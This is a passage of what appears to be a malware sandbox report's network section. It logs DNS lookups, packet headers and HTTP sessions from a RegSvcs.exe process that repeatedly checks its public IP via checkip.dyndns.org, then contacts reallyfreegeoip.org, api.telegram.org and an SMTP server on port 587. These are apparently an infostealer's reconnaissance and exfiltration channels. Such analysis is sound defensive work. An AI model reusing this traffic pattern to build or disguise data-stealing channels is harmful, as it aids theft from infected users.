                                                                                                                  Jan 14, 2025 16:57:45.622622967 CET44349958104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:45.622693062 CET49958443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:45.622934103 CET49958443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:45.622946978 CET44349958104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:45.675263882 CET4995280192.168.2.10132.226.247.73
                                                                                                                  Jan 14, 2025 16:57:46.087726116 CET44349958104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:46.089415073 CET49958443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:46.089448929 CET44349958104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:46.229388952 CET44349958104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:46.229459047 CET44349958104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:46.229538918 CET49958443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:46.229979038 CET49958443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:46.240256071 CET4995280192.168.2.10132.226.247.73
                                                                                                                  Jan 14, 2025 16:57:46.240608931 CET49962443192.168.2.10149.154.167.220
                                                                                                                  Jan 14, 2025 16:57:46.240653992 CET44349962149.154.167.220192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:46.241091013 CET49962443192.168.2.10149.154.167.220
                                                                                                                  Jan 14, 2025 16:57:46.241610050 CET49962443192.168.2.10149.154.167.220
                                                                                                                  Jan 14, 2025 16:57:46.241624117 CET44349962149.154.167.220192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:46.245212078 CET8049952132.226.247.73192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:46.245484114 CET4995280192.168.2.10132.226.247.73
                                                                                                                  Jan 14, 2025 16:57:46.848349094 CET44349962149.154.167.220192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:46.848414898 CET49962443192.168.2.10149.154.167.220
                                                                                                                  Jan 14, 2025 16:57:46.850178003 CET49962443192.168.2.10149.154.167.220
                                                                                                                  Jan 14, 2025 16:57:46.850183964 CET44349962149.154.167.220192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:46.850418091 CET44349962149.154.167.220192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:46.852129936 CET49962443192.168.2.10149.154.167.220
                                                                                                                  Jan 14, 2025 16:57:46.895327091 CET44349962149.154.167.220192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:47.106307030 CET44349962149.154.167.220192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:47.106393099 CET44349962149.154.167.220192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:47.106442928 CET49962443192.168.2.10149.154.167.220
                                                                                                                  Jan 14, 2025 16:57:47.109121084 CET49962443192.168.2.10149.154.167.220
                                                                                                                  Jan 14, 2025 16:57:54.785693884 CET4990180192.168.2.10132.226.247.73
                                                                                                                  Jan 14, 2025 16:57:54.929533958 CET50011587192.168.2.10208.91.199.225
                                                                                                                  Jan 14, 2025 16:57:54.934354067 CET58750011208.91.199.225192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:54.934691906 CET50011587192.168.2.10208.91.199.225
                                                                                                                  Jan 14, 2025 16:57:55.498307943 CET58750011208.91.199.225192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:55.498743057 CET50011587192.168.2.10208.91.199.225
                                                                                                                  Jan 14, 2025 16:57:55.503786087 CET58750011208.91.199.225192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:55.753878117 CET58750011208.91.199.225192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:55.754164934 CET50011587192.168.2.10208.91.199.225
                                                                                                                  Jan 14, 2025 16:57:55.759052038 CET58750011208.91.199.225192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:55.909369946 CET58750011208.91.199.225192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:55.909801006 CET50011587192.168.2.10208.91.199.225
                                                                                                                  Jan 14, 2025 16:57:55.914573908 CET58750011208.91.199.225192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:56.066633940 CET58750011208.91.199.225192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:56.067053080 CET50011587192.168.2.10208.91.199.225
                                                                                                                  Jan 14, 2025 16:57:56.074301958 CET58750011208.91.199.225192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:56.215243101 CET58750011208.91.199.225192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:56.216193914 CET50011587192.168.2.10208.91.199.225
                                                                                                                  Jan 14, 2025 16:57:56.221044064 CET58750011208.91.199.225192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:56.388755083 CET58750011208.91.199.225192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:56.393136978 CET50011587192.168.2.10208.91.199.225
                                                                                                                  Jan 14, 2025 16:57:56.398363113 CET58750011208.91.199.225192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:56.540721893 CET58750011208.91.199.225192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:56.551135063 CET50011587192.168.2.10208.91.199.225
                                                                                                                  Jan 14, 2025 16:57:56.551135063 CET50011587192.168.2.10208.91.199.225
                                                                                                                  Jan 14, 2025 16:57:56.551393032 CET50011587192.168.2.10208.91.199.225
                                                                                                                  Jan 14, 2025 16:57:56.551393986 CET50011587192.168.2.10208.91.199.225
                                                                                                                  Jan 14, 2025 16:57:56.551393986 CET50011587192.168.2.10208.91.199.225
                                                                                                                  Jan 14, 2025 16:57:56.556617975 CET58750011208.91.199.225192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:56.556653023 CET58750011208.91.199.225192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:56.556705952 CET58750011208.91.199.225192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:56.556735039 CET58750011208.91.199.225192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:56.556762934 CET58750011208.91.199.225192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:56.897588968 CET58750011208.91.199.225192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:56.956842899 CET50011587192.168.2.10208.91.199.225

                                                                                                                  UDP Packets

                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Jan 14, 2025 16:57:17.448195934 CET5195353192.168.2.101.1.1.1
                                                                                                                  Jan 14, 2025 16:57:17.455282927 CET53519531.1.1.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:18.419682980 CET6325553192.168.2.101.1.1.1
                                                                                                                  Jan 14, 2025 16:57:18.426973104 CET53632551.1.1.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:31.371951103 CET6337953192.168.2.101.1.1.1
                                                                                                                  Jan 14, 2025 16:57:31.378680944 CET53633791.1.1.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:40.794367075 CET6332453192.168.2.101.1.1.1
                                                                                                                  Jan 14, 2025 16:57:40.802177906 CET53633241.1.1.1192.168.2.10

                                                                                                                  DNS Queries

                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                  Jan 14, 2025 16:57:17.448195934 CET192.168.2.101.1.1.10xb244Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                  Jan 14, 2025 16:57:18.419682980 CET192.168.2.101.1.1.10x315dStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                  Jan 14, 2025 16:57:31.371951103 CET192.168.2.101.1.1.10x4b36Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                  Jan 14, 2025 16:57:40.794367075 CET192.168.2.101.1.1.10x8210Standard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)false

                                                                                                                  DNS Answers

                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                  Jan 14, 2025 16:57:08.452882051 CET1.1.1.1192.168.2.100x701cNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.netazurefd-t-fb-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Jan 14, 2025 16:57:08.452882051 CET1.1.1.1192.168.2.100x701cNo error (0)dual.s-part-0017.t-0009.fb-t-msedge.nets-part-0017.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Jan 14, 2025 16:57:08.452882051 CET1.1.1.1192.168.2.100x701cNo error (0)s-part-0017.t-0009.fb-t-msedge.net13.107.253.45A (IP address)IN (0x0001)false
                                                                                                                  Jan 14, 2025 16:57:17.455282927 CET1.1.1.1192.168.2.100xb244No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Jan 14, 2025 16:57:17.455282927 CET1.1.1.1192.168.2.100xb244No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                  Jan 14, 2025 16:57:17.455282927 CET1.1.1.1192.168.2.100xb244No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                  Jan 14, 2025 16:57:17.455282927 CET1.1.1.1192.168.2.100xb244No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                  Jan 14, 2025 16:57:17.455282927 CET1.1.1.1192.168.2.100xb244No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                  Jan 14, 2025 16:57:17.455282927 CET1.1.1.1192.168.2.100xb244No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                  Jan 14, 2025 16:57:18.426973104 CET1.1.1.1192.168.2.100x315dNo error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                  Jan 14, 2025 16:57:18.426973104 CET1.1.1.1192.168.2.100x315dNo error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                  Jan 14, 2025 16:57:18.426973104 CET1.1.1.1192.168.2.100x315dNo error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                  Jan 14, 2025 16:57:18.426973104 CET1.1.1.1192.168.2.100x315dNo error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                  Jan 14, 2025 16:57:18.426973104 CET1.1.1.1192.168.2.100x315dNo error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                  Jan 14, 2025 16:57:18.426973104 CET1.1.1.1192.168.2.100x315dNo error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                  Jan 14, 2025 16:57:18.426973104 CET1.1.1.1192.168.2.100x315dNo error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                  Jan 14, 2025 16:57:31.378680944 CET1.1.1.1192.168.2.100x4b36No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                  Jan 14, 2025 16:57:40.802177906 CET1.1.1.1192.168.2.100x8210No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                                                  Jan 14, 2025 16:57:40.802177906 CET1.1.1.1192.168.2.100x8210No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                                                  Jan 14, 2025 16:57:40.802177906 CET1.1.1.1192.168.2.100x8210No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                                                  Jan 14, 2025 16:57:40.802177906 CET1.1.1.1192.168.2.100x8210No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false

                                                                                                                  HTTP Request Dependency Graph

                                                                                                                  • reallyfreegeoip.org
                                                                                                                  • api.telegram.org
                                                                                                                  • checkip.dyndns.org

                                                                                                                  HTTP Packets

                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  0192.168.2.1049754132.226.247.73807804C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 14, 2025 16:57:17.481364965 CET151OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 14, 2025 16:57:18.147962093 CET273INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 14 Jan 2025 15:57:18 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                  Jan 14, 2025 16:57:18.155138016 CET127OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Jan 14, 2025 16:57:18.363883018 CET273INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 14 Jan 2025 15:57:18 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                  Jan 14, 2025 16:57:19.126864910 CET127OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Jan 14, 2025 16:57:19.335119963 CET273INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 14 Jan 2025 15:57:19 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  1192.168.2.1049772132.226.247.73807804C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 14, 2025 16:57:20.024249077 CET127OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Jan 14, 2025 16:57:20.701334953 CET273INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 14 Jan 2025 15:57:20 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  2192.168.2.1049779132.226.247.73807804C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 14, 2025 16:57:21.333246946 CET151OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 14, 2025 16:57:22.035029888 CET273INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 14 Jan 2025 15:57:21 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  3192.168.2.1049791132.226.247.73807804C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 14, 2025 16:57:22.668600082 CET151OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 14, 2025 16:57:23.380018950 CET273INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 14 Jan 2025 15:57:23 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  4192.168.2.1049800132.226.247.73807804C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 14, 2025 16:57:24.265418053 CET151OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 14, 2025 16:57:24.957489967 CET273INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 14 Jan 2025 15:57:24 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  5192.168.2.1049814132.226.247.73807804C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 14, 2025 16:57:25.611735106 CET151OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 14, 2025 16:57:26.291223049 CET273INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 14 Jan 2025 15:57:26 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  6192.168.2.1049827132.226.247.73807804C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 14, 2025 16:57:26.924217939 CET151OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 14, 2025 16:57:27.662666082 CET273INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 14 Jan 2025 15:57:27 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  7192.168.2.1049838132.226.247.73807804C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 14, 2025 16:57:28.346054077 CET151OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 14, 2025 16:57:30.000355005 CET273INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 14 Jan 2025 15:57:28 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                  Jan 14, 2025 16:57:30.004739046 CET273INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 14 Jan 2025 15:57:28 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                  Jan 14, 2025 16:57:30.004851103 CET273INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 14 Jan 2025 15:57:28 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                  Jan 14, 2025 16:57:30.004977942 CET273INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 14 Jan 2025 15:57:28 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  8192.168.2.1049871132.226.247.73807432C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
